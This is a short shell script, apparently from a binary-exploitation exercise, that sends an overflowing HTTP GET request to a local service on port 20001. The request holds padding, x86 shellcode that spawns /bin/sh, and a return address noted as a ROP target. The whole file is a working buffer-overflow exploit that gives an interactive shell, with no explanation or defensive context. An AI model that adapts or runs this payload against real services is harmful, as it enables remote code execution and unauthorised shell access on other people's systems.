#!/bin/sh

# Main objective / plan:
  # Jump to location


# SHELLCODE:


# ROP:
  # 1: ret: 0x80488b9

(perl -e 'print "GET " . "/" . "A"x83 . "\x31\xd2\x31\xc9\x31\xc0\x50\x68\x41\x41\x73\x68\x68\x41\x62\x69\x6e\x89\xe0\x31\xdb\x80\x3c\x18\x41\x75\x04\x80\x2c\x18\x12\x80\xc3\x01\x80\xfb\x08\x7e\xee\x31\xc0\x89\xe3\xb0\x0b\xcd\x80\x31\xdb\x31\xc0\xfe\xc0\xcd\x80\x90" . "\xb9\x88\x04\x08" . " HTTP/1.1"'; cat) | nc.traditional -nv 127.0.0.1 20001

